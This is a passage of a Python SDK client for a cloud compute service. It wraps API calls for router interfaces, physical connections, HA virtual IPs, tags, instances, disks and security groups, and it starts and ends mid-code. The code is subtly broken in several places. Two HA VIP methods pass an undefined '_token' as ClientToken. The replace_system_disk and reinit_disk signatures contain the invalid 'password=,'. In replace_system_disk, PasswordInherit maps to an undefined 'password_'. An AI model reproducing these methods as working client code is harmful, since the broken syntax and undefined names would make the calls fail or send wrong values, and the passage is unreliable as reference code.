'DescribeVirtualBorderRoutersForPhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PhysicalConnectionId": physical_connection_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_virtual_border_routers( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeVirtualBorderRouters', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_physical_connections( self, list_of_filter_=None, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, page_size=None, user_cidr=None, owner_id=None, page_number=None): api_request = APIRequest('DescribePhysicalConnections', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "PageSize": page_size, "UserCidr": user_cidr, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_access_points( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, page_size=None, owner_id=None, type_=None, page_number=None): api_request = APIRequest('DescribeAccessPoints', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "OwnerId": owner_id, "Type": type_, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_virtual_border_router( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, vbr_id=None, owner_id=None): api_request = APIRequest('DeleteVirtualBorderRouter', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "VbrId": vbr_id, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_physical_connection( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, physical_connection_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeletePhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PhysicalConnectionId": physical_connection_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_virtual_border_router( self, resource_owner_id=None, circuit_code=None, vlan_id=None, client_token=None, resource_owner_account=None, owner_account=None, description=None, owner_id=None, peer_gateway_ip=None, peering_subnet_mask=None, region_id=None, physical_connection_id=None, name=None, local_gateway_ip=None, user_cidr=None, vbr_owner_id=None): api_request = APIRequest('CreateVirtualBorderRouter', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CircuitCode": circuit_code, "VlanId": vlan_id, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "PeerGatewayIp": peer_gateway_ip, "PeeringSubnetMask": peering_subnet_mask, "RegionId": region_id, "PhysicalConnectionId": physical_connection_id, "Name": name, "LocalGatewayIp": local_gateway_ip, "UserCidr": user_cidr, "VbrOwnerId": vbr_owner_id} return self._handle_request(api_request).result def create_physical_connection( self, access_point_id=None, redundant_physical_connection_id=None, peer_location=None, resource_owner_id=None, port_type=None, circuit_code=None, bandwidth=None, client_token=None, resource_owner_account=None, owner_account=None, description=None, type_=None, owner_id=None, line_operator=None, region_id=None, name=None, user_cidr=None): api_request = APIRequest('CreatePhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "AccessPointId": access_point_id, "RedundantPhysicalConnectionId": redundant_physical_connection_id, "PeerLocation": peer_location, "ResourceOwnerId": resource_owner_id, "PortType": port_type, "CircuitCode": circuit_code, "bandwidth": bandwidth, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "Type": type_, "OwnerId": owner_id, "LineOperator": line_operator, "RegionId": region_id, "Name": name, "UserCidr": user_cidr} return self._handle_request(api_request).result def cancel_physical_connection( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, physical_connection_id=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('CancelPhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PhysicalConnectionId": physical_connection_id, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def import_image( self, list_of_disk_device_mapping=None, resource_owner_id=None, license_type=None, resource_owner_account=None, role_name=None, description=None, os_type=None, owner_id=None, platform=None, region_id=None, image_name=None, architecture=None): api_request = APIRequest('ImportImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "DiskDeviceMapping": list_of_disk_device_mapping, "ResourceOwnerId": resource_owner_id, "LicenseType": license_type, "ResourceOwnerAccount": resource_owner_account, "RoleName": role_name, "Description": description, "OSType": os_type, "OwnerId": owner_id, "Platform": platform, "RegionId": region_id, "ImageName": image_name, "Architecture": architecture} repeat_info = {"DiskDeviceMapping": ('DiskDeviceMapping', 'list', 'dict', [('OSSBucket', 'str', None, None), ('DiskImSize', 'str', None, None), ('Format', 'str', None, None), ('Device', 'str', None, None), ('OSSObject', 'str', None, None), ('DiskImageSize', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def export_image( self, resource_owner_id=None, image_id=None, oss_bucket=None, resource_owner_account=None, region_id=None, oss_prefix=None, role_name=None, owner_id=None, image_format=None): api_request = APIRequest('ExportImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "OSSBucket": oss_bucket, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OSSPrefix": oss_prefix, "RoleName": role_name, "OwnerId": owner_id, "ImageFormat": image_format} return self._handle_request(api_request).result def describe_tasks( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, end_time=None, start_time=None, owner_id=None, task_ids=None, page_number=None, task_status=None, region_id=None, page_size=None, task_action=None): api_request = APIRequest('DescribeTasks', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "StartTime": start_time, "OwnerId": owner_id, "TaskIds": task_ids, "PageNumber": page_number, "TaskStatus": task_status, "RegionId": region_id, "PageSize": page_size, "TaskAction": task_action} return self._handle_request(api_request).result def describe_task_attribute( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, task_id=None): api_request = APIRequest('DescribeTaskAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "TaskId": task_id} return self._handle_request(api_request).result def cancel_task( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, task_id=None): api_request = APIRequest('CancelTask', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "TaskId": task_id} return self._handle_request(api_request).result def describe_instance_type_families( self, generation=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeInstanceTypeFamilies', 'GET', 'http', 'RPC', 'query') api_request._params = { "Generation": generation, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_router_interface_spec( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, router_interface_id=None, owner_id=None, spec=None): api_request = APIRequest('ModifyRouterInterfaceSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "RouterInterfaceId": router_interface_id, "OwnerId": owner_id, "Spec": spec} return self._handle_request(api_request).result def modify_router_interface_attribute( self, opposite_router_id=None, resource_owner_id=None, resource_owner_account=None, description=None, health_check_target_ip=None, owner_id=None, router_interface_id=None, opposite_interface_owner_id=None, region_id=None, health_check_source_ip=None, name=None, opposite_router_type=None, opposite_interface_id=None): api_request = APIRequest('ModifyRouterInterfaceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "OppositeRouterId": opposite_router_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "Description": description, "HealthCheckTargetIp": health_check_target_ip, "OwnerId": owner_id, "RouterInterfaceId": router_interface_id, "OppositeInterfaceOwnerId": opposite_interface_owner_id, "RegionId": region_id, "HealthCheckSourceIp": health_check_source_ip, "Name": name, "OppositeRouterType": opposite_router_type, "OppositeInterfaceId": opposite_interface_id} return self._handle_request(api_request).result def describe_router_interfaces( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeRouterInterfaces', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_router_interface( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, router_interface_id=None, owner_id=None): api_request = APIRequest('DeleteRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "RouterInterfaceId": router_interface_id, "OwnerId": owner_id} return self._handle_request(api_request).result def deactivate_router_interface( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, router_interface_id=None): api_request = APIRequest('DeactivateRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "RouterInterfaceId": router_interface_id} return self._handle_request(api_request).result def create_router_interface( self, access_point_id=None, opposite_router_id=None, opposite_access_point_id=None, resource_owner_id=None, role=None, client_token=None, health_check_target_ip=None, description=None, spec=None, region_id=None, user_cidr=None, opposite_interface_id=None, instance_charge_type=None, period=None, auto_pay=None, resource_owner_account=None, opposite_region_id=None, owner_account=None, owner_id=None, opposite_interface_owner_id=None, router_type=None, health_check_source_ip=None, router_id=None, opposite_router_type=None, name=None, pricing_cycle=None): api_request = APIRequest('CreateRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "AccessPointId": access_point_id, "OppositeRouterId": opposite_router_id, "OppositeAccessPointId": opposite_access_point_id, "ResourceOwnerId": resource_owner_id, "Role": role, "ClientToken": client_token, "HealthCheckTargetIp": health_check_target_ip, "Description": description, "Spec": spec, "RegionId": region_id, "UserCidr": user_cidr, "OppositeInterfaceId": opposite_interface_id, "InstanceChargeType": instance_charge_type, "Period": period, "AutoPay": auto_pay, "ResourceOwnerAccount": resource_owner_account, "OppositeRegionId": opposite_region_id, "OwnerAccount": owner_account, "OwnerId": owner_id, "OppositeInterfaceOwnerId": opposite_interface_owner_id, "RouterType": router_type, "HealthCheckSourceIp": health_check_source_ip, "RouterId": router_id, "OppositeRouterType": opposite_router_type, "Name": name, "PricingCycle": pricing_cycle} return self._handle_request(api_request).result def connect_router_interface( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, router_interface_id=None): api_request = APIRequest('ConnectRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "RouterInterfaceId": router_interface_id} return self._handle_request(api_request).result def activate_router_interface( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, router_interface_id=None): api_request = APIRequest('ActivateRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "RouterInterfaceId": router_interface_id} return self._handle_request(api_request).result def unassociate_ha_vip( self, ha_vip_id=None, resource_owner_id=None, instance_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, force=None, owner_id=None): api_request = APIRequest('UnassociateHaVip', 'GET', 'http', 'RPC', 'query') api_request._params = { "HaVipId": ha_vip_id, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": _token, "RegionId": region_id, "OwnerAccount": owner_account, "Force": force, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_ha_vip_attribute( self, ha_vip_id=None, resource_owner_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('ModifyHaVipAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "HaVipId": ha_vip_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": _token, "RegionId": region_id, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_ha_vips( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeHaVips', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_ha_vip( self, ha_vip_id=None, resource_owner_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteHaVip', 'GET', 'http', 'RPC', 'query') api_request._params = { "HaVipId": ha_vip_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_ha_vip( self, vswitch_id=None, ip_address=None, resource_owner_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('CreateHaVip', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "IpAddress": ip_address, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "RegionId": region_id, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def associate_ha_vip( self, ha_vip_id=None, resource_owner_id=None, instance_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('AssociateHaVip', 'GET', 'http', 'RPC', 'query') api_request._params = { "HaVipId": ha_vip_id, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def renew_instance( self, resource_owner_id=None, period=None, period_unit=None, instance_id=None, client_token=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('RenewInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "PeriodUnit": period_unit, "InstanceId": instance_id, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def remove_tags( self, resource_owner_id=None, resource_id=None, resource_owner_account=None, region_id=None, list_of_tag=None, owner_id=None, resource_type=None): api_request = APIRequest('RemoveTags', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Tag": list_of_tag, "OwnerId": owner_id, "ResourceType": resource_type} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_tags( self, resource_owner_id=None, resource_id=None, resource_owner_account=None, region_id=None, page_size=None, list_of_tag=None, owner_id=None, category=None, resource_type=None, page_number=None): api_request = APIRequest('DescribeTags', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "Tag": list_of_tag, "OwnerId": owner_id, "Category": category, "ResourceType": resource_type, "PageNumber": page_number} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_resource_by_tags( self, resource_owner_id=None, resource_owner_account=None, region_id=None, page_size=None, list_of_tag=None, owner_id=None, resource_type=None, page_number=None): api_request = APIRequest('DescribeResourceByTags', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "Tag": list_of_tag, "OwnerId": owner_id, "ResourceType": resource_type, "PageNumber": page_number} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def add_tags( self, resource_owner_id=None, resource_id=None, resource_owner_account=None, region_id=None, list_of_tag=None, owner_id=None, resource_type=None): api_request = APIRequest('AddTags', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Tag": list_of_tag, "OwnerId": owner_id, "ResourceType": resource_type} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def unassociate_eip_address( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, instance_type=None, allocation_id=None, owner_id=None): api_request = APIRequest('UnassociateEipAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "InstanceType": instance_type, "AllocationId": allocation_id, "OwnerId": owner_id} return self._handle_request(api_request).result def stop_instance( self, resource_owner_id=None, instance_id=None, dry_run=None, resource_owner_account=None, confirm_stop=None, owner_account=None, stopped_mode=None, owner_id=None, hibernate=None, force_stop=None): api_request = APIRequest('StopInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "ConfirmStop": confirm_stop, "OwnerAccount": owner_account, "StoppedMode": stopped_mode, "OwnerId": owner_id, "Hibernate": hibernate, "ForceStop": force_stop} return self._handle_request(api_request).result def start_instance( self, source_region_id=None, init_local_disk=None, resource_owner_id=None, instance_id=None, dry_run=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('StartInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "SourceRegionId": source_region_id, "InitLocalDisk": init_local_disk, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def revoke_security_group_egress( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, region_id=None, ipv6_dest_cidr_ip=None, ipv6_source_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, dest_group_id=None, owner_id=None, dest_group_owner_account=None, priority=None, dest_cidr_ip=None, dest_group_owner_id=None): api_request = APIRequest('RevokeSecurityGroupEgress', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "RegionId": region_id, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "DestGroupId": dest_group_id, "OwnerId": owner_id, "DestGroupOwnerAccount": dest_group_owner_account, "Priority": priority, "DestCidrIp": dest_cidr_ip, "DestGroupOwnerId": dest_group_owner_id} return self._handle_request(api_request).result def revoke_security_group( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, source_group_owner_id=None, source_group_owner_account=None, region_id=None, ipv6_dest_cidr_ip=None, ipv6_source_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, owner_id=None, priority=None, dest_cidr_ip=None, source_group_id=None): api_request = APIRequest('RevokeSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "SourceGroupOwnerId": source_group_owner_id, "SourceGroupOwnerAccount": source_group_owner_account, "RegionId": region_id, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "OwnerId": owner_id, "Priority": priority, "DestCidrIp": dest_cidr_ip, "SourceGroupId": source_group_id} return self._handle_request(api_request).result def resize_disk( self, resource_owner_id=None, resource_owner_account=None, client_token=None, owner_account=None, new_size=None, disk_id=None, owner_id=None, type_=None): api_request = APIRequest('ResizeDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "NewSize": new_size, "DiskId": disk_id, "OwnerId": owner_id, "Type": type_} return self._handle_request(api_request).result def reset_disk( self, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, owner_account=None, disk_id=None, owner_id=None): api_request = APIRequest('ResetDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DiskId": disk_id, "OwnerId": owner_id} return self._handle_request(api_request).result def replace_system_disk( self, resource_owner_id=None, image_id=None, resource_owner_account=None, client_token=None, owner_account=None, security_enhancement_strategy=None, key_pair_name=None, owner_id=None, platform=None, password=, instance_id=None, password_inherit=None, system_disk_size=None, disk_id=None, use_additional_service=None, architecture=None): api_request = APIRequest('ReplaceSystemDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "SecurityEnhancementStrategy": security_enhancement_strategy, "KeyPairName": key_pair_name, "OwnerId": owner_id, "Platform": platform, "Password": password, "InstanceId": instance_id, "PasswordInherit": password_, "SystemDisk.Size": system_disk_size, "DiskId": disk_id, "UseAdditionalService": use_additional_service, "Architecture": architecture} return self._handle_request(api_request).result def release_public_ip_address( self, resource_owner_id=None, public_ip_address=None, instance_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('ReleasePublicIpAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PublicIpAddress": public_ip_address, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def release_eip_address( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, allocation_id=None, owner_id=None): api_request = APIRequest('ReleaseEipAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "AllocationId": allocation_id, "OwnerId": owner_id} return self._handle_request(api_request).result def reinit_disk( self, resource_owner_id=None, password=, resource_owner_account=None, auto_start_instance=None, owner_account=None, disk_id=None, security_enhancement_strategy=None, key_pair_name=None, owner_id=None): api_request = APIRequest('ReInitDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Password": password, "ResourceOwnerAccount": resource_owner_account, "AutoStartInstance": auto_start_instance, "OwnerAccount": owner_account, "DiskId": disk_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "KeyPairName": key_pair_name, "OwnerId": owner_id} return self._handle_request(api_request).result def reboot_instance( self, resource_owner_id=None, instance_id=None, dry_run=None, resource_owner_account=None, owner_account=None, owner_id=None, force_stop=None): api_request = APIRequest('RebootInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ForceStop": force_stop} return self._handle_request(api_request).result def modify_vswitch_attribute( self, vswitch_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, vswitch_name=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('ModifyVSwitchAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VSwitchName": vswitch_name, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_vrouter_attribute( self, vrouter_name=None, resource_owner_id=None, vrouter_id=None, resource_owner_account=None, region_id=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('ModifyVRouterAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "VRouterName": vrouter_name, "ResourceOwnerId": resource_owner_id, "VRouterId": vrouter_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_vpc_attribute( self, vpc_name=None, resource_owner_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_account=None, cidr_block=None, description=None, user_cidr=None, owner_id=None): api_request = APIRequest('ModifyVpcAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "VpcName": vpc_name, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerAccount": owner_account, "CidrBlock": cidr_block, "Description": description, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_snapshot_attribute( self, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, owner_account=None, description=None, snapshot_name=None, owner_id=None): api_request = APIRequest('ModifySnapshotAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "SnapshotName": snapshot_name, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_security_group_attribute( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, security_group_id=None, description=None, owner_id=None, security_group_name=None): api_request = APIRequest('ModifySecurityGroupAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "Description": description, "OwnerId": owner_id, "SecurityGroupName": security_group_name} return self._handle_request(api_request).result def modify_instance_vpc_attribute( self, vswitch_id=None, private_ip_address=None, 